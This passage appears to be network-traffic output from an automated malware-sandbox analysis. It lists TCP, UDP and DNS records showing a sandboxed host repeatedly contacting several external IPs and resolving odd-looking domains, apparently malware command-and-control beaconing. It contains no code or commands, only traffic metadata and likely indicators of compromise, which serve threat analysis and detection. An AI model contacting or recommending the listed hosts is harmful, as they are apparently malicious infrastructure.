                                                        Nov 7, 2024 15:51:10.726788044 CET8049983168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:10.730227947 CET4998380192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:11.089446068 CET4998380192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:11.094633102 CET8049983168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:12.108218908 CET4998480192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:12.113295078 CET8049984168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:12.113400936 CET4998480192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:12.125232935 CET4998480192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:12.130072117 CET8049984168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:12.130207062 CET8049984168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:13.264903069 CET8049984168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:13.264976025 CET4998480192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:13.636290073 CET4998480192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:13.641295910 CET8049984168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:14.656702042 CET4998580192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:14.661895037 CET8049985168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:14.661963940 CET4998580192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:14.671600103 CET4998580192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:14.676496029 CET8049985168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:15.803564072 CET8049985168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:15.803730011 CET4998580192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:15.804616928 CET4998580192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:15.809443951 CET8049985168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:21.318948030 CET4998680192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:21.324022055 CET8049986150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:21.324084044 CET4998680192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:21.336498022 CET4998680192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:21.341458082 CET8049986150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:22.206223965 CET8049986150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:22.206278086 CET8049986150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:22.206439972 CET4998680192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:22.343616962 CET8049986150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:22.343703985 CET4998680192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:22.839349985 CET4998680192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:23.860290051 CET4998780192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:24.426707029 CET8049987150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:24.426780939 CET4998780192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:24.441174030 CET4998780192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:24.446156979 CET8049987150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:25.339709997 CET8049987150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:25.339797974 CET8049987150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:25.339847088 CET4998780192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:25.476057053 CET8049987150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:25.478274107 CET4998780192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:25.948823929 CET4998780192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:26.969407082 CET4998880192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:26.974569082 CET8049988150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:26.974651098 CET4998880192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:26.988409996 CET4998880192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:26.993581057 CET8049988150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:26.994313002 CET8049988150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:27.860903978 CET8049988150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:27.861690044 CET8049988150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:27.862210989 CET4998880192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:28.001315117 CET8049988150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:28.001436949 CET4998880192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:28.495554924 CET4998880192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:29.514875889 CET4998980192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:29.520102978 CET8049989150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:29.520320892 CET4998980192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:29.528069019 CET4998980192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:29.532963991 CET8049989150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:30.407376051 CET8049989150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:30.407434940 CET8049989150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:30.408169985 CET4998980192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:30.556338072 CET8049989150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:30.556457043 CET4998980192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:30.582427979 CET4998980192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:30.587539911 CET8049989150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:35.646147013 CET4999080192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:35.651088953 CET8049990188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:35.657006979 CET4999080192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:35.669001102 CET4999080192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:35.673995018 CET8049990188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:36.983582973 CET8049990188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:36.985105991 CET8049990188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:36.985157013 CET4999080192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:37.174236059 CET4999080192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:38.189097881 CET4999180192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:38.194206953 CET8049991188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:38.194653034 CET4999180192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:38.205995083 CET4999180192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:38.210808992 CET8049991188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:39.472732067 CET8049991188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:39.475511074 CET8049991188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:39.476120949 CET4999180192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:39.717299938 CET4999180192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:40.740813017 CET4999280192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:40.745832920 CET8049992188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:40.745940924 CET4999280192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:40.758377075 CET4999280192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:40.763587952 CET8049992188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:40.763613939 CET8049992188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:42.018539906 CET8049992188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:42.024770975 CET8049992188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:42.025674105 CET4999280192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:42.027348042 CET8049992188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:42.027410984 CET4999280192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:42.261100054 CET4999280192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:43.280191898 CET4999380192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:43.285244942 CET8049993188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:43.285399914 CET4999380192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:43.292861938 CET4999380192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:43.298760891 CET8049993188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:44.726872921 CET8049993188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:44.728554010 CET8049993188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:44.728604078 CET4999380192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:44.730565071 CET4999380192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:44.735380888 CET8049993188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:49.829989910 CET4999480192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:49.835994005 CET8049994103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:49.836186886 CET4999480192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:49.847692013 CET4999480192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:49.852720976 CET8049994103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:50.856875896 CET8049994103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:51.011004925 CET4999480192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:51.057271004 CET8049994103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:51.057399035 CET4999480192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:51.354872942 CET4999480192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:52.373806953 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:52.379689932 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:52.379792929 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:52.392051935 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:52.398080111 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:53.901726961 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:53.904449940 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:53.904738903 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:53.904947042 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:53.904962063 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:53.905050039 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:53.905050039 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:53.905735970 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:53.906642914 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:53.908565998 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:53.908993006 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:54.922003984 CET4999680192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:54.927048922 CET8049996103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:54.927124977 CET4999680192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:54.946218967 CET4999680192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:54.951283932 CET8049996103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:54.951308966 CET8049996103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:55.929886103 CET8049996103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:55.979856968 CET4999680192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:56.123006105 CET8049996103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:56.126030922 CET4999680192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:56.461958885 CET4999680192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:57.467231035 CET4999780192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:57.472229958 CET8049997103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:57.472527981 CET4999780192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:57.480072021 CET4999780192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:57.484987020 CET8049997103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:58.468180895 CET8049997103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:58.510867119 CET4999780192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:58.659259081 CET8049997103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:58.659372091 CET4999780192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:58.660423040 CET4999780192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:58.665652990 CET8049997103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:52:03.717875004 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:03.723042011 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:03.723990917 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:03.737556934 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:03.742439985 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.770688057 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.770894051 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.770906925 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.770947933 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:04.771615028 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.771627903 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.771653891 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:04.772386074 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.772403002 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.772420883 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:04.773247004 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.773302078 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:05.245398045 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:06.264913082 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:06.269830942 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:06.272795916 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:06.283986092 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:06.288938999 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.365489960 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.365623951 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.365634918 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.365669966 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:07.366060019 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.366072893 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.366097927 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:07.366951942 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.366966009 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.366976976 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.366991997 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:07.367012978 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:07.368405104 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.368453026 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:07.793842077 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:08.812886000 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:08.817939997 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:08.818018913 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:08.832688093 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:08.837702036 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:08.837866068 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.870068073 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.870471001 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.870486021 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.870606899 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:09.870893002 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.870907068 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.870980978 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:09.871692896 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.871747971 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:09.872524023 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.872998953 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.873119116 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:10.341816902 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:11.358201981 CET5000180192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:11.364253044 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:11.364411116 CET5000180192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:11.373037100 CET5000180192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:11.379172087 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.409739971 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.409813881 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.409852028 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.410015106 CET5000180192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:12.410378933 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.410394907 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.410531998 CET5000180192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:12.411174059 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.411195993 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.411236048 CET5000180192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:12.411969900 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.412015915 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.412162066 CET5000180192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:12.412869930 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.413007975 CET5000180192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:12.416930914 CET5000180192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:12.421824932 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:18.539352894 CET5000280192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:18.545579910 CET8050002156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:18.545661926 CET5000280192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:18.563327074 CET5000280192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:18.568875074 CET8050002156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:19.725002050 CET8050002156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:19.727330923 CET8050002156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:19.727444887 CET5000280192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:20.073348045 CET5000280192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:21.093609095 CET5000380192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:21.098925114 CET8050003156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:21.099016905 CET5000380192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:21.114036083 CET5000380192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:21.119235039 CET8050003156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:22.067702055 CET8050003156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:22.121732950 CET5000380192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:22.243813038 CET8050003156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:22.244548082 CET5000380192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:22.620419979 CET5000380192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:23.640541077 CET5000480192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:23.645621061 CET8050004156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:23.648916006 CET5000480192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:23.659780979 CET5000480192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:23.664978027 CET8050004156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:23.666728020 CET8050004156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:24.672694921 CET8050004156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:24.713799000 CET5000480192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:24.796768904 CET8050004156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:24.796823025 CET5000480192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:25.167038918 CET5000480192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:26.187026024 CET5000580192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:26.192025900 CET8050005156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:26.192178965 CET5000580192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:26.199745893 CET5000580192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:26.204946041 CET8050005156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:27.156936884 CET8050005156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:27.157059908 CET8050005156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:27.157159090 CET5000580192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:27.340441942 CET8050005156.234.28.94192.168.2.10
                                                        Nov 7, 2024 15:52:27.340584040 CET5000580192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:27.341494083 CET5000580192.168.2.10156.234.28.94
                                                        Nov 7, 2024 15:52:27.346613884 CET8050005156.234.28.94192.168.2.10

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 7, 2024 15:50:15.095102072 CET5665553192.168.2.101.1.1.1
                                                        Nov 7, 2024 15:50:15.117604017 CET53566551.1.1.1192.168.2.10
                                                        Nov 7, 2024 15:50:20.192517996 CET6297453192.168.2.101.1.1.1
                                                        Nov 7, 2024 15:50:20.226219893 CET53629741.1.1.1192.168.2.10
                                                        Nov 7, 2024 15:50:37.187918901 CET6279953192.168.2.101.1.1.1
                                                        Nov 7, 2024 15:50:37.893816948 CET53627991.1.1.1192.168.2.10
                                                        Nov 7, 2024 15:50:51.578124046 CET5151153192.168.2.101.1.1.1
                                                        Nov 7, 2024 15:50:52.066457987 CET53515111.1.1.1192.168.2.10
                                                        Nov 7, 2024 15:51:06.437057972 CET6235753192.168.2.101.1.1.1
                                                        Nov 7, 2024 15:51:06.836339951 CET53623571.1.1.1192.168.2.10
                                                        Nov 7, 2024 15:51:20.812669992 CET5538453192.168.2.101.1.1.1
                                                        Nov 7, 2024 15:51:21.316452980 CET53553841.1.1.1192.168.2.10
                                                        Nov 7, 2024 15:51:35.597115993 CET6341253192.168.2.101.1.1.1
                                                        Nov 7, 2024 15:51:35.638514996 CET53634121.1.1.1192.168.2.10
                                                        Nov 7, 2024 15:51:49.749473095 CET6362553192.168.2.101.1.1.1
                                                        Nov 7, 2024 15:51:49.825793028 CET53636251.1.1.1192.168.2.10
                                                        Nov 7, 2024 15:52:03.671716928 CET4970253192.168.2.101.1.1.1
                                                        Nov 7, 2024 15:52:03.711690903 CET53497021.1.1.1192.168.2.10
                                                        Nov 7, 2024 15:52:17.420767069 CET5759753192.168.2.101.1.1.1
                                                        Nov 7, 2024 15:52:18.417372942 CET5759753192.168.2.101.1.1.1
                                                        Nov 7, 2024 15:52:18.536149025 CET53575971.1.1.1192.168.2.10
                                                        Nov 7, 2024 15:52:18.536604881 CET53575971.1.1.1192.168.2.10

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Nov 7, 2024 15:50:15.095102072 CET192.168.2.101.1.1.10x5edaStandard query (0)www.mt2rahu.techA (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:50:20.192517996 CET192.168.2.101.1.1.10x9747Standard query (0)www.lexjetcenter.netA (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:50:37.187918901 CET192.168.2.101.1.1.10xc47eStandard query (0)www.elarac.topA (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:50:51.578124046 CET192.168.2.101.1.1.10x3bf1Standard query (0)www.budged.netA (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:51:06.437057972 CET192.168.2.101.1.1.10x32d6Standard query (0)www.5hdgb2p9a.buzzA (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:51:20.812669992 CET192.168.2.101.1.1.10xbe53Standard query (0)www.j252mv.siteA (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:51:35.597115993 CET192.168.2.101.1.1.10x48f9Standard query (0)www.lnnn.funA (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:51:49.749473095 CET192.168.2.101.1.1.10x8b0Standard query (0)www.7153115.xyzA (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:52:03.671716928 CET192.168.2.101.1.1.10xfed1Standard query (0)www.tingba.sbsA (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:52:17.420767069 CET192.168.2.101.1.1.10x7af9Standard query (0)www.jllllbx.topA (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:52:18.417372942 CET192.168.2.101.1.1.10x7af9Standard query (0)www.jllllbx.topA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 7, 2024 15:50:15.117604017 CET1.1.1.1192.168.2.100x5edaName error (3)www.mt2rahu.technonenoneA (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:50:20.226219893 CET1.1.1.1192.168.2.100x9747No error (0)www.lexjetcenter.netlexjetcenter.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 7, 2024 15:50:20.226219893 CET1.1.1.1192.168.2.100x9747No error (0)lexjetcenter.net3.33.130.190A (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:50:20.226219893 CET1.1.1.1192.168.2.100x9747No error (0)lexjetcenter.net15.197.148.33A (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:50:37.893816948 CET1.1.1.1192.168.2.100xc47eNo error (0)www.elarac.top192.64.118.221A (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:50:52.066457987 CET1.1.1.1192.168.2.100x3bf1No error (0)www.budged.netbudged.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 7, 2024 15:50:52.066457987 CET1.1.1.1192.168.2.100x3bf1No error (0)budged.net195.154.200.15A (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:51:06.836339951 CET1.1.1.1192.168.2.100x32d6No error (0)www.5hdgb2p9a.buzz168.76.221.252A (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:51:21.316452980 CET1.1.1.1192.168.2.100xbe53No error (0)www.j252mv.site150.95.254.16A (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:51:35.638514996 CET1.1.1.1192.168.2.100x48f9No error (0)www.lnnn.fun188.114.96.3A (IP address)IN (0x0001)false
